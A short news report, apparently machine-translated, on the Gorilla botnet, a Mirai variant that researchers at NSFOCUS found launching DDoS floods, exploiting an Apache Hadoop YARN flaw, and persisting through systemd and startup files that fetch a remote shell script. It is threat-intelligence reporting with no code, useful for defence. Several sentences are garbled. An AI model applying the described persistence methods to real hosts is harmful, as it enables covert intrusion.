Cybersecurity researchers have discovered a new family of botnet malware called Gorilla (aka GorillaBot) that is a leak variant Mirai botnet source code.
Cybersecurity firm NSFOCUS, which discovered the activity last month, said botnet “issued more than 300,000 attack commands with shocking attack density” between September 4 and 27, 2024. Each day, at least 20,000 commands designed to carry out distributed denial-of-service (DDoS) attacks come from the botnet. on average.
The botnet is said to have targeted more than 100 countries, attacking universities, government websites, telecommunications, banking, gaming and gambling sectors. China, USA, Canada and Germany became the most attacked countries.
The Beijing-headquartered company said it mainly uses Gorilla UDP floodACK BYPASS flood, Valve Source Engine (VSE) flooding., SYN floodand ACK flood conduct DDoS attacks by adding connectionless nature of the UDP protocol allows arbitrary spoofing of IP addresses to generate large amounts of traffic.
In addition to supporting multiple processor architectures such as ARM, MIPS, x86_64, and x86, the botnet provides the ability to connect to one of five predefined Command and Control (C2) servers to await DDoS commands.
In an interesting twist, the malware also embeds functionality to exploit a security flaw in Apache Hadoop YARN RPC to achieve remote code execution. It should be noted that the deficiency was abused in the wild as early as 2021, according to reports Alibaba Cloud and Trend Micro.
Host persistence is achieved by creating a service file called custom.service in the “/etc/systemd/system/” directory and setting it to start automatically every time the system starts.
The service, for its part, is responsible for loading and executing a shell script (“lol.sh”) from the remote server (“pen.gorillafirewall(.)su”). Similar commands are also added to the “/etc/inittab”, “/etc/profile” and “/boot/bootcmd” files to load and run the shell script at system startup or user login.
“He introduced various DDoS attack techniques and used encryption algorithms commonly used in Keksec group to hide key information while simultaneously using multiple methods to maintain long-term control over IoT devices and cloud hosts, demonstrating a high level of counter-detection awareness as a new family of botnets,” NSFOCUS said.
